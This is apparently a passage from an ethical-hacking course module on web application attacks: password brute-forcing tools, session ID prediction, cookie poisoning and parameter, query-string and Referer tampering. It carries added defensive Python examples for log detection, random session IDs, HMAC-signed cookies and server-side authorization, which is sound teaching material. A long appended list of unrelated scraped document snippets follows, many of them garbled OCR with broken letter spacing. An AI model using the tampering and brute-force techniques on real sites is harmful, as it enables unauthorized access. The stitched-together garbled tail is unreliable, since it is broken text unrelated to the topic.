FIGURE: Brutus Tool Screenshot (Brutus AET2, www.hoobie.net/brutus: target connection options for HTTP (Basic Auth) with port, connections, timeout, and proxy settings; HTTP (Basic) options with the HEAD method and KeepAlive; authentication options with a user file and a word list; the status pane reports 6 users and 818 passwords loaded for a maximum of 4908 authentication attempts, above a Positive Authentication Results table)
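Tools such as Hydra, Burp Intruder, and Brutus leave a recognizable pattern in the application's login log: many failures from one address, many failures against one account, or one address cycling through many user names. The following is an added example, not code from the CEH module or from any of the tools above, of detection logic for the password-guessing and brute-forcing sections run over constructed log lines. The log format, the sample addresses, and the thresholds are assumptions for this example; a real application's log needs its own parser and tuning.

```python
"""Added example, not code from the CEH module or from any tool it lists:
flag password-guessing bursts in constructed web-application login logs.
The log format, sample lines and thresholds are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp>Z ip=<addr> user=<name> result=OK|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

# Detection thresholds (assumed; tune to the application's real traffic).
WINDOW = timedelta(minutes=5)
MAX_FAILS_PER_IP = 20      # one source hammering the login form
MAX_FAILS_PER_USER = 10    # one account receiving many wrong passwords
MAX_USERS_PER_IP = 5       # one source trying many different accounts


def parse(lines):
    """Return sorted (timestamp, ip, user, result) tuples; non-matching lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
            events.append((ts, m["ip"], m["user"], m["result"]))
    return sorted(events)


def failure_bursts(events, key_index, limit):
    """Keys (0 = ip, 1 = user) whose failed logins exceed `limit` inside any
    WINDOW-long interval, using a sliding window of failure timestamps."""
    recent = defaultdict(deque)
    flagged = set()
    for ts, ip, user, result in events:
        if result != "FAIL":
            continue
        key = (ip, user)[key_index]
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > WINDOW:
            q.popleft()
        if len(q) > limit:
            flagged.add(key)
    return flagged


def spraying_sources(events, limit):
    """Addresses that tried more than `limit` distinct user names: user name
    enumeration or password spraying rather than a single-account attack."""
    users_per_ip = defaultdict(set)
    for _ts, ip, user, _result in events:
        users_per_ip[ip].add(user)
    return {ip for ip, users in users_per_ip.items() if len(users) > limit}


def analyze(lines):
    events = parse(lines)
    return {
        "brute_force_ips": failure_bursts(events, 0, MAX_FAILS_PER_IP),
        "targeted_accounts": failure_bursts(events, 1, MAX_FAILS_PER_USER),
        "spraying_ips": spraying_sources(events, MAX_USERS_PER_IP),
    }


def sample_log():
    """Constructed sample: one single-account burst, one user-name sweep, and normal traffic."""
    base = datetime(2013, 1, 10, 10, 0, 0)
    lines = []
    for i in range(25):   # 25 wrong passwords for "admin" from one address in two minutes
        t = base + timedelta(seconds=5 * i)
        lines.append(f"{t.isoformat()}Z ip=203.0.113.5 user=admin result=FAIL")
    for i in range(8):    # one address probing eight sequential user names
        t = base + timedelta(seconds=30 * i)
        lines.append(f"{t.isoformat()}Z ip=198.51.100.7 user=user10{i + 1} result=FAIL")
    lines.append(f"{base.isoformat()}Z ip=192.0.2.10 user=marc result=OK")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()}Z ip=192.0.2.11 user=marc result=FAIL")
    return lines


if __name__ == "__main__":
    for name, hits in analyze(sample_log()).items():
        print(name, sorted(hits))
```

The two windowed counters catch the Hydra/Brutus style of attack (one account, many passwords), while the distinct-user count catches the enumeration and spraying pattern that stays under any per-account lockout threshold. In production the thresholds should be set from observed baseline traffic, and the flags feed a rate limiter or an alert rather than being printed.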

Session Attacks: Session ID Prediction/Brute Forcing

Every time a user logs in to a particular website, a session ID is given to the user. This session ID is valid until the session is terminated, and a new session ID is provided when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid session IDs.

In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users. Attackers then analyze the captured session IDs to determine the session ID generation process, such as the structure of the session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it. In addition, the attacker can implement a brute-force technique to generate and test different values of the session ID until he or she successfully gets access to the application.

Vulnerable session generation mechanisms that use session IDs composed from the user name or other predictable information, like a timestamp or the client IP address, can be exploited by easily guessing valid session IDs.

FIGURE: Session ID Prediction/Brute Forcing (a captured HTTP request to a WebGoat instance, Host janaina, from a Mozilla/Firefox user agent; it carries an Authorization: Basic header and the header "Cookie: JSESSIONID=user01", which is annotated "Predictable Session Cookie")

For certain web applications, the session ID information is usually composed of a string of fixed width. Randomness is essential in order to avoid prediction. From the diagram you can see that the session ID variable is indicated by JSESSIONID, and its value is "user01," which corresponds to the user name. By guessing a new value for it, say "user02," it is possible for the attacker to gain unauthorized access to the application.
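The following is an added example, not code from the CEH module, from WebGoat, or from any servlet container: it contrasts a session ID built from the user name and a counter, as in the figure's JSESSIONID=user01, with one drawn from the operating system's cryptographic random source, and adds a small check that a sample of issued IDs does not follow a guessable sequence or have low per-character entropy. The two generators, the checker, and its threshold are assumptions made for this example.

```python
"""Added example, not code from the CEH module or from WebGoat: a
predictable session ID scheme beside a random one, and a check that a
sample of issued IDs is not trivially guessable. All of it is assumed."""
import math
import re
import secrets
from collections import Counter


def predictable_session_id(username: str, counter: int) -> str:
    """Weak scheme of the kind in the figure: user name plus a running
    counter, so holding one ID is enough to derive the next."""
    return f"{username}{counter:02d}"


def random_session_id(nbytes: int = 16) -> str:
    """Strong scheme: 128 bits from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(nbytes)


def shannon_entropy_bits(ids) -> float:
    """Per-character Shannon entropy over the whole sample. It is only an
    upper bound on unpredictability, but a low value is a clear red flag."""
    text = "".join(ids)
    total = len(text)
    return -sum(c / total * math.log2(c / total) for c in Counter(text).values())


def looks_sequential(ids) -> bool:
    """True when every ID shares one prefix and the trailing digits advance
    by a constant step, i.e. the next value is trivially guessable."""
    if len(ids) < 3:
        return False
    parts = [re.fullmatch(r"(.*?)(\d+)", i) for i in ids]
    if not all(parts):
        return False
    prefixes = {p.group(1) for p in parts}
    numbers = [int(p.group(2)) for p in parts]
    steps = {b - a for a, b in zip(numbers, numbers[1:])}
    return len(prefixes) == 1 and len(steps) == 1


def assess(ids, min_entropy_bits: float = 4.0) -> dict:
    """Summarize a sample of session IDs; the entropy threshold is assumed."""
    sequential = looks_sequential(ids)
    entropy = shannon_entropy_bits(ids)
    return {
        "sequential": sequential,
        "entropy_per_char": round(entropy, 2),
        "acceptable": not sequential and entropy >= min_entropy_bits,
    }


if __name__ == "__main__":
    weak = [predictable_session_id("user", n) for n in range(1, 6)]
    strong = [random_session_id() for _ in range(50)]
    print(weak, assess(weak))
    print(strong[:2], assess(strong))
```

The sequential check is the one an analyst would apply to IDs collected the way the text describes (sniffed from several logins); the entropy figure complements it for IDs that are not sequential but are still built from low-variety material such as timestamps. Generating IDs with a CSPRNG and keeping them unrelated to the user name removes both weaknesses at the source.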

Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security. If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping. Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include OWASP Zed Attack Proxy, Burp Suite, etc.

OWASP Zed Attack Proxy

Source: https://www.owasp.org

OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

FIGURE: OWASP Zed Attack Proxy Tool Screenshot (ZAP "Untitled Session" window with the Sites tree and Request, Response, and Break tabs; the request pane shows a captured GET request to tr.adinterax.com with User-Agent, Cache-Control, Accept, Referer, Accept-Encoding, Accept-Language, Accept-Charset, Cookie, and Host headers; the lower pane carries History, Search, Break Points, Alerts, Active Scan, Spider, Brute Force, Port Scan, Fuzzer, Params, and Output tabs)
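The text above points out that Base64 or ROT13 "protection" of a cookie is reversible and therefore no protection at all. The following is an added example, not code from the CEH module or from any of the tools it lists, showing a cookie that is merely Base64-encoded beside one that carries an HMAC-SHA256 signature, and demonstrating that the decode-edit-re-encode step described above succeeds silently against the first and is rejected by the server for the second. The cookie layout, the key handling, and the sample user record are constructed for this example.

```python
"""Added example, not code from the CEH module or from any tool it lists:
an encoded-only cookie beside an HMAC-signed one, and the server's
response to an altered copy of each. Layout, key handling and the user
record are constructed for this example."""
import base64
import hashlib
import hmac
import json
import secrets

# Assumed to live in server-side configuration; it is never sent to the client.
SERVER_KEY = secrets.token_bytes(32)


def _b64(data: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()


def _unb64(text: str) -> dict:
    return json.loads(base64.urlsafe_b64decode(text.encode()))


def encode_only(data: dict) -> str:
    """The false-security pattern: encoding is reversible, not a protection."""
    return _b64(data)


def decode_only(cookie: str) -> dict:
    """Server side of encode_only(): nothing here can tell whether the cookie was altered."""
    return _unb64(cookie)


def sign_cookie(data: dict, key: bytes = SERVER_KEY) -> str:
    """Format: payload.signature, where signature = HMAC-SHA256(key, payload)."""
    payload = _b64(data)
    sig = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{sig}"


def verify_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the cookie's data only when the signature checks out, else None."""
    payload, sep, sig = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):   # constant-time comparison
        return None
    return _unb64(payload)


def alter_cookie(cookie: str, changes: dict) -> str:
    """Decode, edit, re-encode: the poisoning step the text describes, kept
    here only to show how each scheme responds. For a signed cookie the
    original signature is carried over unchanged, since the key is unknown."""
    payload, sep, sig = cookie.rpartition(".")
    if not sep:
        return _b64({**_unb64(cookie), **changes})
    return f"{_b64({**_unb64(payload), **changes})}{sep}{sig}"


if __name__ == "__main__":
    plain = encode_only({"user": "jason", "role": "user"})
    print(decode_only(alter_cookie(plain, {"role": "admin"})))    # accepted: role is now admin
    signed = sign_cookie({"user": "jason", "role": "user"})
    print(verify_cookie(signed))                                   # accepted: original data
    print(verify_cookie(alter_cookie(signed, {"role": "admin"})))  # None: signature mismatch
```

The signature does not hide the cookie's contents (anyone can still Base64-decode the payload), so passwords and other secrets still do not belong in it; what it adds is integrity, so that an edited cookie is refused. Keeping the cookie down to an opaque random session ID that the server looks up, as in the session ID example earlier, avoids the problem altogether.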

Web App Hacking Methodology

Attack Web Servers
Attack Authentication Mechanism
Attack Session Management Mechanism
Attack Data Connectivity
Attack Web Services

Authorization protects web applications by giving certain users the authority to access the applications and restricting other users from accessing them. Attackers, by means of authorization attacks, try to gain access to information resources without proper credentials. The ways to attack authorization schemes are explained on the following slides.

Authorization Attack

Attackers manipulate HTTP requests to subvert the application's authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. Attackers first access the web application using a low-privileged account and then escalate privileges to access protected resources.

In an authorization attack, the attacker first finds the lowest privileged account, then logs in as an authentic user and slowly escalates privileges to access protected resources. The sources that attackers use in order to perform authorization attacks include the uniform resource identifier, parameter tampering, POST data, HTTP headers, the query string, cookies, and hidden tags.

Parameter Tampering

Parameter tampering is an attack based on the manipulation of parameters exchanged between server and client in order to modify application data, such as the price and quantity of products, permissions and user credentials, etc. This information is usually stored in cookies, URL query strings, or hidden form fields, and it is used to increase application control and functionality.

Post Data

Post data often comprises authorization and session information, since in most applications the information provided by the client must be associated with the session that provided it. An attacker exploiting vulnerabilities in the post data can easily manipulate the post data and the information in it.

HTTP Request Tampering

Attackers tamper with the HTTP request without using another user's ID. The attacker changes the request in transit, before the message is received by the intended receiver.

Query String Tampering

An attacker tampers with the query string when the web application uses query strings to pass messages between pages. If the query string is visible in the address bar of the browser, the attacker can easily change a string parameter to bypass authorization mechanisms.

FIGURE: Query String Tampering
http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com
https://juggyshop.com/books/download/pdf
https://juggybank.com/login/home.jsp?admin=true

Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers

If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities. In the slide's captured request (Host: janaina:8180, a Mozilla/Firefox User-Agent, Proxy-Connection: keep-alive), the header Referer: http://juggyboy:8180/Applications/Download?Admin=False is sent; ItemId=201 is not accessible because the Admin parameter is set to false, so the attacker can change it to true and access protected items.
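Every tampering case above (the mailbox parameter, the admin=true query parameter, the Referer header) works only when the server reads a privilege or ownership decision from something the client controls. The following is an added example, not code from the CEH module, showing an authorization routine that ignores all of those fields and derives every decision from the server-side session record, plus a helper that records the tampering signals worth logging. The request structure, session store, session IDs, and protected paths are constructed for this example; the host names and URLs are the ones from the slide.

```python
"""Added example, not code from the CEH module: server-side authorization
that never trusts query parameters or the Referer header. The request
model, session store and protected paths are constructed for this example."""
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    method: str
    url: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)

    @property
    def path(self) -> str:
        return urlsplit(self.url).path

    @property
    def query(self) -> dict:
        return {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}


# Constructed server-side session store: session ID -> authenticated identity.
# Roles live here, on the server, and nowhere in the request.
SESSIONS = {
    "s-3f9a": {"user": "john", "role": "user"},
    "s-7c21": {"user": "root", "role": "admin"},
}

# Paths that require the admin role (assumed for the example).
ADMIN_PATHS = {"/Applications/Download"}


def authorize(req: Request) -> dict:
    """Decide from the session record only. ?admin=true, ?mailbox=..., and
    Referer are read from the request but never from trusted for the decision."""
    session = SESSIONS.get(req.cookies.get("sid", ""))
    if session is None:
        return {"allowed": False, "admin_view": False, "reason": "not authenticated"}
    is_admin = session["role"] == "admin"

    if req.path == "/mail.aspx":
        # Horizontal check: a user may open only their own mailbox.
        owner = req.query.get("mailbox")
        if owner != session["user"] and not is_admin:
            return {"allowed": False, "admin_view": is_admin,
                    "reason": "mailbox belongs to another user"}
    elif req.path in ADMIN_PATHS and not is_admin:
        # Vertical check: the admin role comes from the session, not from the query string.
        return {"allowed": False, "admin_view": False, "reason": "admin role required"}

    # admin_view reflects the session role; ?admin=true has no effect on it.
    return {"allowed": True, "admin_view": is_admin, "reason": "ok"}


def tamper_indicators(req: Request) -> list:
    """Signals worth logging and alerting on: client-supplied privilege flags,
    and a Referer whose host does not match the application's own Host."""
    signals = []
    if req.query.get("admin", "").lower() == "true":
        signals.append("client-supplied admin=true")
    referer, host = req.headers.get("Referer"), req.headers.get("Host")
    if referer and host and urlsplit(referer).netloc != host:
        signals.append("Referer host does not match Host")
    return signals


if __name__ == "__main__":
    john = {"sid": "s-3f9a"}
    for url in ("http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com",
                "http://www.juggyboy.com/mail.aspx?mailbox=alice",
                "https://juggybank.com/login/home.jsp?admin=true"):
        r = Request("GET", url, cookies=john)
        print(url, authorize(r), tamper_indicators(r))
```

The pattern is the usual fix for the whole section: authentication state is looked up server-side by an opaque session ID, and both the vertical check (role) and the horizontal check (resource ownership) are evaluated against that record on every request. The indicator helper does not change any decision; it exists so that the attempts the slide describes show up in logs even though they fail.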


More information

AN EVALUATION OF SHORT TERM TREATMENT PROGRAM FOR PERSONS DRIVING UNDER THE INFLUENCE OF ALCOHOL 1978-1981. P. A. V a le s, Ph.D.

AN EVALUATION OF SHORT TERM TREATMENT PROGRAM FOR PERSONS DRIVING UNDER THE INFLUENCE OF ALCOHOL 1978-1981. P. A. V a le s, Ph.D. AN EVALUATION OF SHORT TERM TREATMENT PROGRAM FOR PERSONS DRIVING UNDER THE INFLUENCE OF ALCOHOL 1978-1981 P. A. V a le s, Ph.D. SYNOPSIS Two in d ep en d en t tre a tm e n t g ro u p s, p a r t ic ip

More information

B rn m e d s rlig e b e h o v... 3 k o n o m i... 6. S s k e n d e tils k u d o g k o n o m is k frip la d s... 7 F o r ld re b e ta lin g...

B rn m e d s rlig e b e h o v... 3 k o n o m i... 6. S s k e n d e tils k u d o g k o n o m is k frip la d s... 7 F o r ld re b e ta lin g... V e lf rd s s e k re ta ria te t S a g s n r. 1 4 3 4 1 5 B re v id. 9 9 3 9 7 4 R e f. S O T H D ir. tlf. 4 6 3 1 4 0 0 9 s o fie t@ ro s k ild e.d k G o d k e n d e ls e s k rite rie r fo r p riv a tin

More information

S y ste m s. T h e D atabase. D atabase m anagem e n t sy ste m

S y ste m s. T h e D atabase. D atabase m anagem e n t sy ste m 1 C h apte r 1 1 A D atabase M anagem e n t S y ste m s 1 D atabase M anagem e n t S y ste m s D atabase m anagem e n t sy ste m (D B M S ) S to re larg e co lle ctio n s o f d ata O rg anize th e d ata

More information

Up c om i n g Events

Up c om i n g Events BCASA NEWSLETTER B o s to n C h a p te r o f th e A m e ric a n Sta tis tic a l A s s o c ia tio n Serving Maine, Massachusetts, New Hampshire, Rhode Island, and Vermont Vo lu m e 2 9, N o. 3, J a n u

More information

i n g S e c u r it y 3 1B# ; u r w e b a p p li c a tio n s f r o m ha c ke r s w ith t his å ] í d : L : g u id e Scanned by CamScanner

i n g S e c u r it y 3 1B# ; u r w e b a p p li c a tio n s f r o m ha c ke r s w ith t his å ] í d : L : g u id e Scanned by CamScanner í d : r ' " B o m m 1 E x p e r i e n c e L : i i n g S e c u r it y. 1-1B# ; u r w e b a p p li c a tio n s f r o m ha c ke r s w ith t his g u id e å ] - ew i c h P e t e r M u la e n PACKT ' TAÞ$Æo

More information

M Mobile Based Clinical Decision Support System Bhudeb Chakravarti & Dr. Suman Bhusan Bhattacharyya Provider & Public Health Group, VBU-HL P S aty am C om puter S ervices L im ited Bhudeb_ C hak ravarti@

More information

How To Read A Book

How To Read A Book DECOMPOSING MODERNITY Im ages o f Human E x is te n c e in th e w r itin g s o f E rn e s t B e c k e r B y S te p h e n W illiam M a rtin A TH ESIS in partial fulfillment of the requirements of the Masters

More information

Farmers attitudes toward and evaluation and use of insurance for income protection on Montana wheat farms by Gordon E Rodewald

Farmers attitudes toward and evaluation and use of insurance for income protection on Montana wheat farms by Gordon E Rodewald Farmers attitudes toward and evaluation and use of insurance for income protection on Montana wheat farms by Gordon E Rodewald A THESIS Submitted to the Graduate Faculty in partial fulfillment of the requirements

More information

Software Quality Requirements and Evaluation, the ISO 25000 Series

Software Quality Requirements and Evaluation, the ISO 25000 Series Pittsburgh, PA 15213-3890 Software Quality Requirements and Evaluation, the ISO 25000 Series PSM Technical Working Group February 2004 Dave Zubrow Sponsored by the U.S. Department of Defense Background

More information

UFPA Brazil. d e R e d e s Ó p tic a s e s e u s Im p a c to s n o F u tu r o d a In te r n e t

UFPA Brazil. d e R e d e s Ó p tic a s e s e u s Im p a c to s n o F u tu r o d a In te r n e t A v a n ç o s n o P la n o d e C o n tr o le d e R e d e s Ó p tic a s e s e u s Im p a c to s n o F u tu r o d a In te r n e t A n to n io A b e lé m a b e le m @ u fp a.b r Agenda In tr o d u ç ã o C

More information

C + + a G iriş 2. K o n tro l y a p ıla rı if/e ls e b re a k co n tin u e g o to sw itc h D ö n g ü le r w h ile d o -w h ile fo r

C + + a G iriş 2. K o n tro l y a p ıla rı if/e ls e b re a k co n tin u e g o to sw itc h D ö n g ü le r w h ile d o -w h ile fo r C + + a G iriş 2 K o n tro l y a p ıla rı if/e ls e b re a k co n tin u e g o to sw itc h D ö n g ü le r w h ile d o -w h ile fo r F o n k s iy o n la r N e d ir? N a s ıl k u lla n ılır? P ro to tip v

More information

H ig h L e v e l O v e r v iew. S te p h a n M a rt in. S e n io r S y s te m A rc h i te ct

H ig h L e v e l O v e r v iew. S te p h a n M a rt in. S e n io r S y s te m A rc h i te ct H ig h L e v e l O v e r v iew S te p h a n M a rt in S e n io r S y s te m A rc h i te ct OPEN XCHANGE Architecture Overview A ge nda D es ig n G o als A rc h i te ct u re O ve rv i ew S c a l a b ili

More information

Operational Risk Register. Legal Dem ocratic & Regulatory

Operational Risk Register. Legal Dem ocratic & Regulatory Risk Risk F in a n c e & G o v e rn a n c e > > L e g a l D e m o c ra tic & R e g u la to ry - S te v e B a k e r L D R _ F 0 1 - L a c k o f re s o u rc e s to b e a b le to s p e n d th e a p p ro p

More information

ComWIN Control Desk Management

ComWIN Control Desk Management ComWIN Control Desk Management ComW IN visualises, controls and automates E x tre m e s itu a tio n s su ch as car a c c id e n ts o r te c h n ic a l fa u lts a re ju s t as m u ch p a rt o f th e jo

More information

Critical Review MYSID CRUSTACEANS AS POTENTIAL TEST ORGANISMS FOR THE EVALUATION OF ENVIRONMENTAL ENDOCRINE DISRUPTION: A REVIEW

Critical Review MYSID CRUSTACEANS AS POTENTIAL TEST ORGANISMS FOR THE EVALUATION OF ENVIRONMENTAL ENDOCRINE DISRUPTION: A REVIEW Coi Nb I^HIpRESSj Environm ental Toxicology and Chem istry, Vol. 23, No. 5, pp. 1219-1234, 2004 P rinted in ihc USA 0730-7 2 6 8 /0 4 $12.00 +.00 Critical Review MYSID CRUSTACEANS AS POTENTIAL TEST ORGANISMS

More information

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development

More information

Penetration Testing. Module 20

Penetration Testing. Module 20 Penetration Testing Module 20 Ethical Hacking and Countermeasures Penetration Testing P e n e t r a t i o n T e s t i n g M o d u le 2 0 Engineered by Hackers. Presented by Professionals. C E H E t h i

More information

Combinación de bandas óptima para la discriminación de sabanas colombianas, usando imagen Landsat ETM+ZYXWVUTSRQPONMLKJIHGFEDCB

Combinación de bandas óptima para la discriminación de sabanas colombianas, usando imagen Landsat ETM+ZYXWVUTSRQPONMLKJIHGFEDCB Combinación de bandas óptima para la discriminación de sabanas colombianas, usando imagen Landsat ETM+ZYXWVUTSRQPONMLKJIHGFEDCB O p t i m a l L a n d s a t E T M + b a n d 's c o m b i n a t i o n f o

More information

Health, Insurance, and Pension Plans in Union Contracts

Health, Insurance, and Pension Plans in Union Contracts Health, Insurance, and Pension Plans in Union Contracts Bulletin N o. 1187 UNITED STATES DEPARTMENT OF LABOR James P. Mitchell, Secretary BUREAU OF LABOR STATISTICS Ewan Clague, Commissioner Health, Insurance,

More information

(WAPT) Web Application Penetration Testing

(WAPT) Web Application Penetration Testing (WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:

More information

DESIGNING A HYBRID DOMESTIC VIOLENCE PROSECUTION CLINIC:

DESIGNING A HYBRID DOMESTIC VIOLENCE PROSECUTION CLINIC: FILE:C:\WP51\LYNCH.DTP Jan 01/10/06 Tue 10:22AM DESIGNING A HYBRID DOMESTIC VIOLENCE PROSECUTION CLINIC: Making Bedfellows of Academics, Activists and Prosecutors to Teach Students According to Clinical

More information

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp. and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available

More information

A Unified Approach to Statistical Estimation and Model Parameterisation in Mass Calibration

A Unified Approach to Statistical Estimation and Model Parameterisation in Mass Calibration A Unified Approach to Statistical Estimation and Model Parameterisation in Mass Calibration by Thom as S. Leahy B.Sc. i» A Thesis presented to Dublin City University For the Degree of D octor of Philosophy

More information

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration

More information

UNDERSTANDING FLOW PROCESSING WITHIN THE CISCO ACE M ODULE Application de liv e r y pr odu cts can distr ib u te tr af f ic to applications and w e b se r v ice s u sing v ar y ing le v e ls of application

More information

Where every interaction matters.

Where every interaction matters. Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper

More information

The SmartView Tracker

The SmartView Tracker CHAPTER 5 S m a r tv ie w T r a c k e r In This Chapter The Need for Tracking p ag e 8 9 The C heck P oint S olu tion for Tracking p ag e 9 0 Tracking C onsiderations p ag e 9 6 Tracking C onfigu ration

More information

H a c k i n g M o b i l e. P l a t f o r m. M o d u le 16

H a c k i n g M o b i l e. P l a t f o r m. M o d u le 16 H a c k i n g M o b i l e P l a t f o r m s M o d u le 16 Ethical Hacking and Countermeasures Hacking M obile Platforms M o d u le 16 Engineered by Hackers. Presented by Professionals. CEH Q E t h i c

More information

The Top Web Application Attacks: Are you vulnerable?

The Top Web Application Attacks: Are you vulnerable? QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding

More information

Engenharia de Software

Engenharia de Software Engenharia de Software Gerenciamento de Projeto Ian Sommerville 2000 Software Engineering, 6th edition. Chapter 4 Slide 1 Gerenciamento de Projeto Organização, planejamento e agendamento de projetos de

More information

Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper

Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Securing Web Applications As hackers moved from attacking the network to attacking the deployed applications, a category

More information

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org

More information

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top

More information

An E mpir ical Analysis of Stock and B ond M ar ket Liquidity

An E mpir ical Analysis of Stock and B ond M ar ket Liquidity A p r il 2 2, 2 0 0 2 An E mpir ical Analysis of Stock and B ond M ar ket Liquidity Ta r u n Ch o r d ia, A s a n i S a r ka r, a n d A va n id h a r S u b r a h m a n ya m Go iz u e t a B u s in e s s

More information

Cloud Computing Strategic View

Cloud Computing Strategic View Donald Bell IBM Academic Initiative April 2010 bellds@us.ibm.com Cloud Computing Strategic View Strategy & Enterprise Initiatives Topics Cloud Computing IBM Academic Skills Cloud (Pilot) 2 http://www.youtube.com/watch?v=qb2hjpaqy-k&fmt=18',686,580);

More information

Web Application Security

Web Application Security Web Application Security Prof. Sukumar Nandi Indian Institute of Technology Guwahati Agenda Web Application basics Web Network Security Web Host Security Web Application Security Best Practices Questions?

More information

elearning for Secure Application Development

elearning for Secure Application Development elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security

More information

Last update: February 23, 2004

Last update: February 23, 2004 Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to

More information

How to Successfully Integrate with ERP and Expense Management Systems

How to Successfully Integrate with ERP and Expense Management Systems Treasury and Trade Solutions Citi Commercial Cards Innovation, Efficiency, Simplicity. 2015 Commercial Cards Conference May 18-20, 2015 How to Successfully Integrate with ERP and Expense Management Systems

More information

GlasCraft Air Motor Repair Kits

GlasCraft Air Motor Repair Kits Parts GlasCraft ir Motor Repair Kits 30393B ENG For replacing wear items used on GlasCraft air motors. For professional use only. Not for use in explosive atmospheres. Models M-325, M-500-02, GC2267, GC2273

More information

Application Note: Cisco A S A - Ce r t if ica t e T o S S L V P N Con n e ct ion P r of il e Overview: T h i s a p p l i ca ti o n n o te e x p l a i n s h o w to co n f i g u r e th e A S A to a cco m

More information

Enterprise Application Security Workshop Series

Enterprise Application Security Workshop Series Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants

More information

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

